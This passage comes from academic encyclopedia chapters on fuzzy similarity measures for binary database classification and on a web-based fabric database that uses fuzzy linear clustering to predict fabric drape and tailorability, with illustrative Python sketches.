fore, Single may be more similar to Divorced and Widowed than it is to Married. On the other hand, a “Divorced” person was once married, so perhaps it is more similar to Married than to Single. In short, similarity is a relative rather than an absolute measure; as there is hardly any known automatic way to calculate similarities for such attributes, a domain expert is needed. Similarity for ordinal data, like a satisfaction rank, can be calculated in the same way as for nominal or continuous attributes, depending on the nature of the attribute’s values. Similarity for continuous data like Height can be calculated automatically. Unlike nominal attributes, continuous data carry an intuitive meaning for the “distance” between different values. For example, as regards the Height attribute, the difference between 1.55 and 1.56 is smaller than the distance between 1.55 and 1.70; therefore, the similarity is expected to be higher accordingly. For continuous data, an automatic method can be constructed, as shown below, to calculate the similarities. Depending on the problem domain, a continuous attribute can be divided into one or more fuzzy sets (categories); e.g., the Height attribute
can be divided into three sets: Short, Medium, and Tall. A membership function for each set can be developed. The calculated similarities depend on the specified membership functions; therefore, they are referred to here as fuzzy similarities. The following algorithm can be used for similarity calculations of continuous data:

For each pair of attribute values (v1, v2):
    For each membership function F:
        Similarities(v1, v2) = 1 - distance between F(v1) and F(v2)
    Similarity(v1, v2) = maximum of the calculated Similarities

Now that we have discussed both a model for Fuzzy Binary Representation and a way to calculate similarities, we will show that the new knowledge (fuzzy similarities) added to the standard binary representation improves the similarity measures between different entities, as discussed in the next section.
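A direct Python transcription of this algorithm is sketched below, using hypothetical trapezoidal membership functions for Short, Medium, and Tall heights (in meters); the breakpoints are assumptions, not values given in the text. One interpretation choice is made explicit: only membership functions under which at least one of the two values has a nonzero degree are considered, since a literal maximum over all functions would rate two values as fully similar whenever both lie completely outside the same category.

```python
def trapezoid(x, a, b, c, d):
    """Trapezoidal membership: rises on [a, b], flat on [b, c], falls on [c, d]."""
    if x <= a or x >= d:
        return 0.0
    if b <= x <= c:
        return 1.0
    return (x - a) / (b - a) if x < b else (d - x) / (d - c)

# Hypothetical membership functions for Height in meters (Short, Medium, Tall);
# the breakpoints are illustrative assumptions, not values from the chapter.
MEMBERSHIPS = [
    lambda h: trapezoid(h, 1.00, 1.01, 1.55, 1.65),   # Short
    lambda h: trapezoid(h, 1.55, 1.65, 1.70, 1.80),   # Medium
    lambda h: trapezoid(h, 1.70, 1.80, 2.30, 2.31),   # Tall
]

def fuzzy_similarity(v1, v2, memberships=MEMBERSHIPS):
    """Similarity(v1, v2) = max over F of 1 - |F(v1) - F(v2)|, restricted to
    membership functions under which at least one value has a nonzero degree."""
    sims = [1.0 - abs(f(v1) - f(v2))
            for f in memberships
            if f(v1) > 0.0 or f(v2) > 0.0]
    return max(sims) if sims else 0.0

for v1, v2 in [(1.55, 1.56), (1.56, 1.60), (1.55, 1.84)]:
    print((v1, v2), round(fuzzy_similarity(v1, v2), 2))
# The printed values depend entirely on the assumed membership functions and
# therefore differ from the similarities shown in the chapter's Table 2.
```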
COMPARING STANDARD AND FUZZY SIMILARITIES

In this section, we compare standard and fuzzy similarities. The similarities were calculated according to the Dice index for the example represented in Table 4. Table 5 combines similarities of the different entities related to (a) Marital Status (nominal), (b) Height (continuous), and (c) both the Marital Status and Height attributes. Several points and findings arise from the representations shown above (Table 5). These are briefly highlighted below:

1. In our small example, a nominal attribute (Marital Status) represented in the standard binary representation cannot be used for classification. In contrast, the Fuzzy Binary Representation, with a large diversity of similarity results, enables better classification. Grouping entities with a similarity equal to or greater than 0.7 yields a class of entities 2, 3, 4, and 5, which represent Single, Divorced, and Widowed, all belonging to the set “one person”.

2. For a continuous attribute (Height) represented in the standard binary representation, classification is not possible. In contrast, the Fuzzy Binary Representation, with its diversity of similarity results, will once again enable better classification. Entities 1 and 5 have absolute similarity (1), since for the Height attribute they are identical. Entities 2 and 4 (similarity = 0.94) are very similar, since they represent the almost identical heights of 1.55 and 1.56, respectively. Classification based on these two entities is possible due to the diversity of similarities.

3. The same phenomena presented for a single attribute (Marital Status or Height) also exist when both attributes (Marital Status + Height) are taken together. A similarity greater than 0.8 is used to group entities 2, 4, and 5, which represent “one person” of around 1.56 meters in height.

Two important advantages of the novel Fuzzy Binary Representation detailed in the current work over the standard binary representation are suggested: (1) it is practically suitable for all attribute types, and (2) it improves classification results.
FUTURE TRENDS

The current work improves classification by adding new similarity knowledge to the standard representation of data. Further research can be conducted to calculate the interrelationships between the different attributes, i.e., the cross-similarities among attributes such as marital status and height. Understanding such interrelationships might further serve to refine the classification and data mining results. Another worthwhile research direction is helping the human domain expert to arrive at the “right” similarities, and thus choose the “right” membership functions. A Decision Support System may provide a way in which to structure the similarity evaluation of the expert and make his/her decisions less arbitrary.
CONCLUSION

In the current paper, the problems of representing and classifying data in databases were addressed. The focus was on Binary Databases, which have been shown in recent years to have an advantage in classification and data mining. Novel aspects for representing fuzziness were shown and a measure of similarity for fuzzy data was developed and described. Such measures are required, as similarity calculations are at the heart of any classification algorithm. Classification examples were illustrated.
The evaluation of similarity measures shows that the standard binary representation is useless when dealing with continuous attributes for classification. The Fuzzy Binary Representation remedies this drawback and results in promising classification based on continuous data attributes. In addition, adding fuzzy similarity was also shown to be useful for regular (nominal, ordinal) data to ensure better classification. In summary, fuzzy representation improves classification results for all attribute types.
REFERENCES

Dice, L.R. (1945). Measures of the amount of ecological association between species. Ecology, 26(3), 297-302.

Erlich, Z., Gelbard, R., & Spiegler, I. (2002). Data mining by means of binary representation: A model for similarity and clustering. Information Systems Frontiers, 4(2), 187-197.

Estivill-Castro, V., & Yang, J. (2004). Fast and robust general purpose clustering algorithms. Data Mining and Knowledge Discovery, 8(2), 127-150.

Gelbard, R., & Spiegler, I. (2000). Hempel's raven paradox: A positive approach to cluster analysis. Computers and Operations Research, 27(4), 305-320.

Gelbard, R., Goldman, O., & Spiegler, I. (2007). Investigating diversity of clustering methods: An empirical comparison. Data & Knowledge Engineering, 63(1), 155-166.

Illingworth, V., Glaser, E.L., & Pyle, I.C. (1983). Hamming distance. In Dictionary of Computing (pp. 162-163). Oxford University Press.

Jain, A.K., & Dubes, R.C. (1988). Algorithms for Clustering Data. Prentice Hall.

Jain, A.K., Murty, M.N., & Flynn, P.J. (1999). Data clustering: A review. ACM Computing Surveys, 31(3), 264-323.

Lim, T.S., Loh, W.Y., & Shih, Y.S. (2000). A comparison of prediction accuracy, complexity, and training time of thirty-three old and new classification algorithms. Machine Learning, 40(3), 203-228.

Mitaim, S., & Kosko, B. (2001). The shape of fuzzy sets in adaptive function approximation. IEEE Transactions on Fuzzy Systems, 9(4), 637-656.

Spiegler, I., & Maayan, R. (1985). Storage and retrieval considerations of binary data bases. Information Processing and Management, 21(3), 233-254.

Zadeh, L.A. (1965). Fuzzy sets. Information and Control, 8(1), 338-353.

Zadeh, L.A. (1971). Similarity relations and fuzzy ordering. Information Sciences, 3, 177-200.

Zhang, B., & Srihari, S.N. (2003). Properties of binary vector dissimilarity measures. In Proc. JCIS Int'l Conf. Computer Vision, Pattern Recognition, and Image Processing (pp. 26-30).

Zhang, B., & Srihari, S.N. (2004). Fast k-nearest neighbor classification using cluster-based trees. IEEE Transactions on Pattern Analysis and Machine Intelligence, 26(4), 525-528.
KEY TERMS

Classification: The partitioning of a data set into subsets, so that the data in each subset (ideally) share some common traits - often proximity according to some defined similarity/distance measure.

Data Mining: The process of automatically searching large volumes of data for patterns, using
tools such as classification, association rule mining, clustering, etc.

Database Binary Representation: A representation where a database is viewed as a two-dimensional matrix that relates entities (rows) to attribute values (columns). Entries in the matrix are either ‘1’ or ‘0’, indicating that a given entity has or lacks a given value.

Fuzzy Logic: An extension of Boolean logic dealing with the concept of partial truth. Fuzzy logic replaces Boolean truth values (0 or 1, black or white, yes or no) with degrees of truth.
Fuzzy Set: An extension of classical set theory. Fuzzy set theory, used in fuzzy logic, permits the gradual assessment of the membership of elements in relation to a set.

Membership Function: The mathematical function that defines the degree of an element’s membership in a fuzzy set. Membership functions return a value in the range of [0,1], indicating membership degree.

Similarity: A numerical estimate of the difference or distance between two entities. The similarity values are in the range of [0,1], indicating similarity degree.
This work was previously published in Encyclopedia of Artificial Intelligence, edited by J. Dopico, J. De la Calle, and A. Sierra, pp. 796-802, copyright 2009 by Information Science Reference (an imprint of IGI Global).
Chapter 7.13
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance

Yan Chen
Louisiana State University Agricultural Center, USA

Graham H. Rong
Massachusetts Institute of Technology, USA

Jianhua Chen
Louisiana State University, USA
ABSTRACT A Web-based fabric database is introduced in terms of its physical structure, software system architecture, basic and intelligent search engines, and various display methods for search results. A fuzzy linear clustering method is used to predict fabric drape coefficient from fabric mechanical and structural properties. Experimental data indicate that fuzzy linear clustering is quite effective for this purpose. A hybrid method combining fuzzy linear clustering with K-nearest neighbor is also applied for the prediction of the fabric drape coefficient with improved prediction accuracy. The study also reveals that the fuzzy linear clustering method can also be used for
predicting fabric tailorability with good prediction accuracy. Mathematical principles of fuzzy comprehensive evaluation are summarized and a typical application for assessing fabric comfort is exhibited. Through the fuzzy calculation, a single numerical value is produced to express female preferences for six fabric types for use in blouses, slacks, and underpants with respect to fabric property changes in an incremental-wear trial. Finally, a neuro-fuzzy computing technique for evaluating nonwoven fabric softness is presented. The combinational use of the fuzzy logic models (CANFIS) and the neural network method makes a significant step toward launching a fabric database application for neural network computing as a routine laboratory evaluation.
INTRODUCTION Fabric end-use performance is determined by fabric mechanical and physical properties. Many aspects of performance, such as softness, tactility, and comfort, are assessed by physiological responses and subjective judgment only because of their physical complexity and users’ preference. Instrumental approaches for directly measuring these fabric quality features are still limited to date. However, with the availability of high-performance computers and advanced computing techniques, opportunities to solve these problems become more realistic. Internet technology is making a notable impact on the traditional textile industry. This revolutionary information technology is helping textile manufacturers to enhance their competitiveness in production management and marketing. As Internet users communicate with each other across networked computers, diverse business applications, ranging from the design of textile products to clothing retailing, are popping up through the Internet. For instance, to meet fashion designers’ increasing desire for online fashion tracking, a Web site called Worth Global Style Network (WGSN, http://www.wgsn.com) was established in London. This Web site is providing the fashion and style industries with trend-watching news and services, including resources for yarn, fabrics, and garment accessories, and graphics of updated design styles and fashion trends. The information, which covers more than 250,000 pages, comes from a team of 150 designers, trend analysts, journalists, and photographers all over the world. Another Web site, TextileWeb (http:// www.textileweb.com), was developed as a community for professionals of the textile industry. It provides product information (buyers’ guide and marketplace) and professional services (job search and training). Online shopping is the ultimate desire for both manufacturers and consumers and is driving Internet technology toward e-commerce.
More and more clothing retailers favor a strong Internet presence to promote online shopping. A recent example of this can be seen with the retailer Neiman Marcus launching a $24 million Web site investment with new multimedia applications (Kemp & Lewis, 2000). The company hopes that the new investment will extend its merchandising strategy and promise to make the online shopping experience more realistic. Today, apparel retailing holds the second place for online sales, next to long-term e-business leader online travel. It is reported that the online sales of apparel, footwear, and accessories have risen to $18.3 billion in 2006, and are expected to reach $22.1 billion in 2007 (Dilworth, 2007). All these figures indicate that the textile and clothing industries will further stimulate the IT industry to develop new technologies for accelerating ecommerce capabilities. Although the IT achievements are significant, online fabric sourcing and shopping still has many obstacles to overcome. Technology, customer service, and distribution management are all challenging apparel manufacturers and retailers. From a technical point of view, apparel design and manufacturing is still more a kind of art than science. For example, fabric quality is mainly assessed by experts’ subjective impression by hand. This traditional skill is still commonly used by fabric finishers, bespoke tailors, and even mass-production garment makers. Thus, few apparel designers care about the importance of fabric physical properties and about how to determine these properties and incorporate them into their designs. Garment making is on a trial-and-error basis. Garment quality relies largely on technicians’ experience and operators’ skill. However, with the severe shortage of experienced textile engineers and hand evaluation experts, the traditional approach is now not practical. Moreover, as automation increases in garment manufacturing, the determination of fabric properties becomes more and more necessary for the control of interaction between making-up machines and fabric
materials. Instrumental measurement of fabric properties is therefore an important technology (Hearle, 1993a). Online evaluation of fabric performance in terms of hand, comfort, tailorability, and drapability mainly depends on two technical aspects. One is the development of a fabric database that includes instrumental data for describing fabric mechanical and physical properties. The other is the identification of mathematical approaches capable of establishing physical models for the prediction or grading of fabric performance. Instrumental methods for measuring fabric’s different properties are mostly available today. The computing techniques for Web-based fabric databases and intelligent search engines can also be obtained inexpensively to meet various end-use needs in the textile and apparel industries. A key issue is the employment of the right algorithms for the right evaluation models. In reality, the search criteria for fashion trends and suitable fabric materials are often fuzzy. For example, the answer to whether or not a particular garment design is fashionable depends on many factors and cannot be easily quantified. Similarly, the judgment of whether or not (or how much) a fabric material is suitable for a specific garment, or whether a garment made from a fabric is comfortable is a fuzzy one. There is also quite some degree of fuzziness in judging whether a fabric is soft or not. Moreover, various fabric properties are related to each other in a fuzzy way. The fabrics stored in the online database are characterized by more than a dozen mechanical properties (such as tensile, shear, etc.) and fabric contents, structure, and end-use information. In addition, a fabric also has other properties such as appearance and tailorability. Intuitively, these more intangible properties are related to mechanical properties of a fabric in a subtle way. A systematic prediction method is desired so that fuzzy queries for fabrics with desired appearance and performance such as tailorability can be answered. In spite of some works on fabric evaluation and classification (Y.
Chen, Collier, & Collier, 1999; Y. Chen, Collier, Hu, & Quebedeaux, 2000), little is known in the textile literature about predicting fabric appearance and tailorability, as well as comfort and softness, from its mechanical properties. This chapter introduces a fabric database and specific fuzzy logic methods for assessing the softness, comfort, drapability, and tailorability of apparel and consumer fabrics according to fabric mechanical and physical properties. The physical structure and software system architecture of the Web-based database are described. Basic and intelligent search engines provided by this database are demonstrated. The searched results can be displayed on the Web page in different formats, such as tables, charts, and dynamic images. Mathematical principles of fuzzy comprehensive evaluation are summarized. The algorithms of fuzzy C-means clustering and fuzzy linear clustering (FLC) are illustrated in the application of establishing the intelligent search engines. A hybrid neuro-fuzzy model called coactive neuro-fuzzy inference systems (CANFIS) is also introduced for use as a preprocessor to perform fuzzy transformation in neural network computing. As an application exhibition, three case studies are presented. The first case is the use of a hybrid method combining the K-nearest neighbor method with fuzzy linear clustering to improve the prediction accuracy for fabric drapability. The second case is the fuzzy comprehensive evaluation of apparel fabric comfort using the fuzzy model M(•, ⊕). The last case is the application of the neuro-fuzzy model for grading fabric softness. The combinational use of the fuzzy logic models and the neural network method makes a significant step toward launching a fabric database application on an office PC. This helps meet the industries' requirements for routine implementation, dynamic updating, and cost-effectiveness in evaluating textile material quality.
PROGRESS OVERVIEW Fuzzy sets and neural networks have been used extensively to solve problems in engineering and science, health care, and financial applications. Applications of fuzzy and neural computing techniques in the fabric and apparel manufacturing industry are gaining more interest from researchers in IT and textile fields. A fuzzy logic based approach was reported that could detect fabric defects in real time (during the weaving process) and control the weaving process (Dorrity, Vachtsevanos, & Jasper, 1996). A back-propagation neural network was used to detect fabric defects (Kuo & Lee, 2003). The researchers have also done work in using fuzzy C-means clustering for automatic fabric print pattern recognition (Kuo, Shih, Kao, & Lee, 2005; Kuo, Shih, & Lee, 2004). We have presented our work in using fuzzy linear clustering for fabric drape prediction (J. Chen, Chen, Zhang, & Gider, 2002). Fuzzy clustering has been used widely in various applications. The fuzzy linear clustering method was developed independently by two different research groups (Hathaway & Bezdek, 1993; Kundu & Chen, 1994). The study showed that the fuzzy linear clusters possess the nice property of being invariant under linear transformations. The applications of fuzzy linear clustering in fuzzy control rule learning have also been investigated (J. Chen & Kundu, 1999; Mikulcic & Chen, 1996; Sabharwal & Chen, 1996). These results indicate that the fuzzy linear clustering method is very useful for capturing linear patterns in data, and that the method has a strong generalization capability for function approximation. We use fuzzy linear clustering for fabric drape prediction and fabric tailorability prediction in this current work. Approaches to evaluating fabric hand can be categorized as subjective assessment and objective assessment. Many textile experts have advocated significantly to the study of subjective assessment and have contributed much to the research literature (Brand, 1964; Ellis & Garnsworthy,
1980; Howorth, 1964). Other textile scientists made great efforts in objective evaluation of fabric hand (Kawabata & Niwa, 1989; Pan, Yen, Zhao, & Yang, 1988a, 1988b, 1988c; Postle & Mahar, 1982). Recently, the method of fuzzy comprehensive evaluation was used to grade fabric hand (Raheel & Liu, 1991; Rong & Slater, 1992). A multivariate statistical method of discriminant analysis was also proposed to establish a nonlinear discriminant function for predicting end uses of apparel fabrics (Y. Chen & Collier, 1997). With the rapid development of computer hardware and software, neural network techniques have been adopted for modeling complex nonlinear problems of textiles. Many neural network models, such as parallel distributed processing, and connectivist and adoptive systems, were applied to the determination of fiber spinability (Pynckels, Kiekens, Sette, Langenhove, & Impe, 1995), yarn strength prediction (Cheng & Adams, 1995), fabric classification (Barrett, Clapp, & Titus, 1996), fabric faults identification (P. W. Chen, Liang, Yau, & Lin, 1998), fabric performance evaluation (Gong & Chen, 1999), and seam pucker rating (Chang & Tae, 1997).
FABRIC DATABASE

An initial objective of this research is to establish an online intelligent database server that will help clothing manufacturers and retailers to pinpoint desired fabrics that match fashion trends in color, drape, and style; to narrow fabric selections to fabrics possessing good physical properties that ensure high quality of garment products; to find better-buy fabrics; and to locate fabric manufacturers and determine the earliest shipping dates of roll materials. This database server is able to provide a dynamic fabric databank consisting of structural parameters, mechanical properties, fabric drape images, making-up process information, and contact information of fabric manufacturers. This chapter reports research progress in
Figure 1. Database structure
establishment of the database server, acquisition of apparel fabrics and fabric property measurement, Web site design and activation, database construction, and data mining programming.
Physical Structure

The physical structure of this online fabric database is illustrated in Figure 1. The system can be accessed by any client through the Internet. A central piece of this system is a networked PC server running Microsoft Active Server Pages and DB2 database software. The server stores all fabric
Figure 2. Database system architecture
information (fabric bank) and database codes. In the present stage, the database includes 185 apparel fabrics from different fabric manufacturers. Mechanical properties of these fabrics have been tested using the instruments of the Kawabata Evaluation System for Fabrics (KES-FB). The KES-FB instruments consist of a tensile and shear tester, a pure bending tester, a compression tester, and a friction and roughness tester that can be used delicately for measuring basic fabric deformations (Kawabata & Niwa, 1989). Fabric drapability has been measured using a Cusick drape tester. On this tester, a fabric circle
is draped over a pedestal, and the draped image (shadow) is projected on a top plate above the pedestal. A paper ring having the same diameter as that of the fabric circle is used to trace the drape shadow. The traced-shadow part of the paper ring is cut and weighed. The ratio of the paper weight of the traced shadow to the weight of the original paper ring is defined as the drape coefficient. The lower the drape coefficient, the better the fabric drapability. Dynamic fabric drape images have been videotaped using a digital video camera. Fabric structural, material, and contact information was also entered into the database.
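Because the drape coefficient is just a weight ratio, its computation is a one-liner; the paper weights below are made-up numbers for illustration.

```python
def drape_coefficient(shadow_paper_weight, full_ring_paper_weight):
    """Ratio of the traced-shadow paper weight to the full paper-ring weight
    (often quoted as a percentage); lower values mean better drapability."""
    return shadow_paper_weight / full_ring_paper_weight

# Hypothetical paper weights in grams.
dc = drape_coefficient(3.1, 6.2)
print(f"drape coefficient = {dc:.2f} ({dc * 100:.0f}%)")
```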
Software System Architecture

The software system for the fabric database is a Web-based application written in Java. As shown in Figure 2, the system consists of three major components: a graphical user interface, an intelligent search engine, and data mining and learning algorithms. A Web page has been designed and used as a graphical user interface. This Web page is located on a school's Web server (http://www.
textilelab.huec.lsu.edu). The intelligent search engine supports several types of user queries. The simplest type of query is a search request that specifies particular values of fabric mechanical properties. For this type of queries, a straightforward search with a certain percentage of searching accuracy for all measured fabric properties can be performed. Matched fabrics are displayed as an answer for the search. Subsequently, clients can further pull out information about fabric manufacturers and fabric prices upon different users’ needs. Fabric mechanical properties such as extension, bending, friction, and so forth are closely related to fabric drapability and tailorability. Such correlation typically takes mechanical properties as independent variables and models the drapability or tailorability as a function of these independent variables. Therefore, a key problem is to discover such correlation patterns between fabric properties and draping or processing performance using computing techniques of data classification. Obtained correlation patterns can then be used for predicting drapability or tailorability of new
Figure 3. User’s interface for accurate search
fabric products or customer fabrics, for example, whether the fabric drapes greatly, moderately, or slightly. In this research, a method of fuzzy linear clustering is applied for data mining and pattern recognition in the established database. Algorithmic details for this method can be found in the related literature (Bezdek, 1980; J. Chen et al., 2002).
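For readers who want to experiment, the sketch below outlines fuzzy linear clustering in the spirit of Hathaway and Bezdek (1993), as it is also described later in this chapter: each cluster is a linear regression model, memberships are updated from the squared residuals, and the two steps alternate until the memberships stabilize. The fuzzifier value, convergence test, random initialization, and the synthetic demonstration data are illustrative assumptions and are not the settings used in the study.

```python
import numpy as np

def fuzzy_linear_clustering(X, y, n_clusters=2, m=2.0, max_iter=100, seed=0):
    """Fuzzy linear (c-regression) clustering sketch.

    X: (n, s) array of predictors (e.g., fabric mechanical properties)
    y: (n,) array of responses (e.g., drape coefficients)
    Returns memberships U with shape (n_clusters, n) and linear coefficients
    with shape (n_clusters, s + 1); column 0 of each row is the intercept."""
    rng = np.random.default_rng(seed)
    n = len(y)
    Xa = np.hstack([np.ones((n, 1)), np.asarray(X, dtype=float)])
    U = rng.random((n_clusters, n))
    U /= U.sum(axis=0)                      # memberships of each point sum to 1

    for _ in range(max_iter):
        # Weighted least-squares fit of one linear model per cluster.
        coeffs = np.empty((n_clusters, Xa.shape[1]))
        for k in range(n_clusters):
            w = U[k] ** m
            A = Xa.T @ (Xa * w[:, None])
            b = Xa.T @ (w * y)
            coeffs[k] = np.linalg.lstsq(A, b, rcond=None)[0]

        # Squared residuals E_ki of point i under the cluster-k model.
        E = (y - coeffs @ Xa.T) ** 2 + 1e-12
        # Membership update: mu_ki = 1 / sum_j (E_ki / E_ji)^(1 / (m - 1)).
        ratio = E[:, None, :] / E[None, :, :]
        U_new = 1.0 / (ratio ** (1.0 / (m - 1))).sum(axis=1)
        if np.max(np.abs(U_new - U)) < 1e-6:
            U = U_new
            break
        U = U_new
    return U, coeffs

# Tiny synthetic demonstration: data drawn from two different linear patterns.
rng = np.random.default_rng(1)
X = rng.random((40, 1))
y = np.where(np.arange(40) < 20, 2.0 * X[:, 0] + 1.0, -1.0 * X[:, 0] + 0.5)
U, coeffs = fuzzy_linear_clustering(X, y, n_clusters=2)
print(np.round(coeffs, 2))   # prints the two fitted coefficient vectors
```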
Search Options The present database provides three types of search options: accurate search, criteria search, and intelligent search. The accurate search helps users find a fabric with the specific mechanical properties they require. The search result can be a perfect match to users’ input, or can have a 10% to 30% variation in the input. This search method is useful when users want to pinpoint a particular fabric for which mechanical properties need to be strictly controlled. For example, as-
Figure 4. Fabric data display
sume that a garment maker has completed a batch of men’s shirts and the mechanical properties of the used shirting fabric have been measured using the Kawabata instruments and stored as a fingerprint in a computer system. The next time the company acquires a new order of the men’s shirt, fabric purchase staff can search for a new fabric supplier using the company’s filed fabric fingerprint. Figure 3 illustrates a sample of the accurate search. The criteria search allows users to search for fabrics by different categories, such as end uses, fiber types, fabric structures, or manufacturers. In the present state, the database provides a criteria search for end uses only. The database intelligent search is based on search engines that run special codes for data mining and pattern learning in response to clients’ needs for evaluating fabric quality features, such as making-up processability (tailorability), hand and drape, and durability. In the present work, an intelligent search engine for predicting the fabric
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
drape coefficient was developed. Each time a search is executed, the search engine runs five times and outputs the mean value of the predictions. Overall accuracy for the drape prediction is about 88% on test data.
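The accurate search described above amounts to a tolerance filter over the stored property values. The sketch below is a minimal illustration of that idea in Python; the record layout, the property names, and the 20% tolerance are assumptions made for the example, not the actual schema of the fabric database.

```python
# Minimal sketch of a tolerance-based ("accurate") fabric search.
# Fabric records and property names are illustrative only.

def accurate_search(fabrics, query, tolerance=0.20):
    """Return IDs of fabrics whose measured properties all fall within
    +/- tolerance of the requested values."""
    matches = []
    for fabric in fabrics:
        ok = True
        for prop, wanted in query.items():
            value = fabric["properties"].get(prop)
            if value is None or abs(value - wanted) > tolerance * abs(wanted):
                ok = False
                break
        if ok:
            matches.append(fabric["id"])
    return matches

# Example usage with made-up records.
fabrics = [
    {"id": "F001", "properties": {"bending_rigidity": 0.082, "shear_stiffness": 0.95}},
    {"id": "F002", "properties": {"bending_rigidity": 0.140, "shear_stiffness": 1.40}},
]
print(accurate_search(fabrics, {"bending_rigidity": 0.08, "shear_stiffness": 1.0}))  # ['F001']
```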
Fabric Data Display

The database has a Web page that allows users to browse the fabric bank by selecting fabric IDs and fabric properties. Once a fabric search is completed, matched fabrics are listed by the fabric ID. Fabric data can be displayed by clicking any individual fabric ID (Figure 4). A dynamic drape image of a selected fabric can be viewed by clicking Click to View Video. The video runs 5 seconds of dynamic drape images for each fabric. This function of the database provides a visual tool for apparel designers and fabric producers to assess real fabric drape appearance.
FUZZY CLUSTERING FOR PREDICTING FABRIC DRAPE/TAILORABILITY

The Problem and Fuzzy Linear Clustering Method

The problem addressed in this section is the following. Suppose we know the major mechanical properties (such as shear, tensile, etc.) of a fabric. Can we predict from these properties whether this fabric would drape heavily or not? Or similarly, can we predict whether a fabric is easy to sew (tailor) or not given knowledge of the fabric's mechanical properties? Thus, the problem to be addressed is a fabric property (draping and/or tailorability) estimation or prediction from other related properties. It is quite natural to desire a method of systematically estimating fabric tailorability. Fabric tailorability depends on many properties of the fabric, and there is no fixed model to automatically estimate tailorability from fabric mechanical properties. Typically, tailorability is obtained by laboratory test sewing, a time- and labor-consuming process. The capability to automatically and reliably estimate fabric tailorability would save garment manufacturers time and money in selecting suitable fabrics. What about the usefulness of the ability to estimate the draping property of a fabric? Although drape coefficient data can be obtained for each fabric by using the Cusick drape tester, it is a tedious process. Thus, it would be desirable to have the ability to predict the drape property of a fabric from its other physical properties so that we probably do not have to physically measure the drape coefficients for every fabric. That is why we conducted the prediction experiments with fuzzy linear clustering in this research. The main principle in addressing the prediction problem is to find a reliable prediction method that is tolerant to noisy data, yet is quite efficient in computation time. Moreover, we would prefer a prediction method that is easily interpreted for human understanding. The approach taken in our work is to use fuzzy linear clustering combined with the K-nearest neighbor method for fabric drape and tailorability prediction. The FLC method of Hathaway and Bezdek (1993) is a generalization of the fuzzy C-means of Bezdek (1980). FLC finds fuzzy clusters by iteratively optimizing an objective function. Given a set of sample data points D = {pi = <xi, yi> : 1 ≤ i ≤ n} and the desired number of clusters C (≥ 2), the algorithm produces C fuzzy clusters Ak, 1 ≤ k ≤ C, and the membership values μki = μk(pi) for each point pi and cluster Ak. Here, each given data point pi is of the form pi = <xi, yi>, where xi = <xi1, xi2, …, xis> is a real-valued vector of dimension s ≥ 1, and yi is a real number. Each fuzzy cluster Ak (1 ≤ k ≤ C) is characterized by a linear function gk(x) = ak0 + ak1x1 + … + aksxs. The algorithm finds the membership values μki and the coefficients in
the linear functions gk(x) such that the objective function Jm is minimized:

J_m = Σ_{k=1}^{C} Σ_{i=1}^{n} (μ_ki)^m [y_i − g_k(x_i)]².    (1)
The constraints Σ_k μ_ki = 1 (summed over all k) and μki ≥ 0 apply here as well. We call the resulting clusters fuzzy linear clusters because of the linearity of the functions gk(x). The computation of the fuzzy linear clusters proceeds from initial randomly generated membership values. The algorithm iteratively computes the linear coefficients by linear regression from the current membership values and then computes the membership values from the current linear coefficients according to the following equation:

μ_ki = [(y_i − g_k(x_i))²]^{−1/(m−1)} / Σ_{j=1}^{C} [(y_i − g_j(x_i))²]^{−1/(m−1)},    (2)
where 1 ≤ k ≤ C and 1 ≤ i ≤ n. The algorithm terminates when the maximum change of the membership values between consecutive iterations falls below a given threshold.
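To make the alternating optimization of Equations 1 and 2 concrete, here is a compact Python sketch. It assumes m = 2 by default and fits each cluster line by weighted least squares; it is meant to illustrate the iteration, not to reproduce the exact implementation used in this work.

```python
import numpy as np

def fuzzy_linear_clustering(X, y, C=3, m=2.0, tol=1e-4, max_iter=100, seed=0):
    """Sketch of fuzzy linear clustering: alternate between weighted
    least-squares fits of the cluster lines g_k(x) (regression step)
    and the membership update of Equation 2."""
    n, s = X.shape
    Xa = np.hstack([np.ones((n, 1)), X])        # prepend the bias term a_k0
    rng = np.random.default_rng(seed)
    U = rng.random((C, n))
    U /= U.sum(axis=0)                          # memberships of each point sum to 1
    coeffs = np.zeros((C, s + 1))
    for _ in range(max_iter):
        # Regression step: weighted least squares per cluster, weights = U**m.
        for k in range(C):
            w = U[k] ** m
            A = Xa * w[:, None]
            coeffs[k] = np.linalg.lstsq(A.T @ Xa, A.T @ y, rcond=None)[0]
        # Membership step (Equation 2).
        err = np.array([(y - Xa @ coeffs[k]) ** 2 for k in range(C)]) + 1e-12
        inv = err ** (-1.0 / (m - 1.0))
        U_new = inv / inv.sum(axis=0)
        if np.abs(U_new - U).max() < tol:       # termination criterion from the text
            U = U_new
            break
        U = U_new
    return coeffs, U
```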
FLC Plus K-Nearest Neighbor Approach

Application of fuzzy linear clustering for data prediction typically involves two steps: the training step and the prediction step. In the training step, we apply the fuzzy linear clustering algorithm (with the number of clusters C specified) to a training data set with n data points. This will produce the cluster centers gk (in the form of linear equations) for 1 ≤ k ≤ C and the fuzzy membership values μki for 1 ≤ k ≤ C and 1 ≤ i ≤ n. The training step will also generate a predicted y value for each training data point <xi, yi>. In the prediction step, given only the x part of a data point (x = <x1, …, xs>), the prediction algorithm will produce an estimated y part. The y value is computed by the following steps.

1. First, for the given data x0, find the nearest neighbor of x0 from the training data, and use μki, the membership value of <xi, yi> in cluster k, as the membership value μk0 of x0 for each 1 ≤ k ≤ C.
2. Next, compute gk(x0) for each linear equation gk.
3. Finally, combine the results of all clusters by the following equation:

y = Σ_{k=1}^{C} μ_k0 g_k(x_0).    (3)
Our initial experiments have confirmed the viability of FLC for fabric drape coefficient prediction. Subsequently, we develop a hybrid method combining the K-nearest neighbor approach with fuzzy linear clustering for the drape prediction task. The hybrid method differs from the initial method described above only in the prediction step. Instead of using only one nearest neighbor to obtain the membership values of a new data point x0 to the fuzzy clusters, multiple nearest neighbors are used for this purpose. Namely, to estimate the membership value μk0 for x0 in cluster Ak, we find the K-nearest neighbors of x0 from the training data set, and then just set μk0 to be the average of membership values of these K-nearest neighbors to cluster Ak. The rest of the prediction step proceeds in the same way.
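A matching sketch of the prediction step (Equation 3) and its K-nearest-neighbor variant is shown below, reusing the coeffs and U returned by the training sketch above. The Euclidean distance and the simple averaging of neighbor memberships are straightforward readings of the description rather than the authors' exact code.

```python
import numpy as np

def flc_predict(x0, X_train, coeffs, U, k_neighbors=1):
    """Predict y for a new point x0: estimate its cluster memberships from
    its K nearest training points, then combine the cluster lines (Eq. 3)."""
    d = np.linalg.norm(X_train - x0, axis=1)        # Euclidean distances
    nearest = np.argsort(d)[:k_neighbors]
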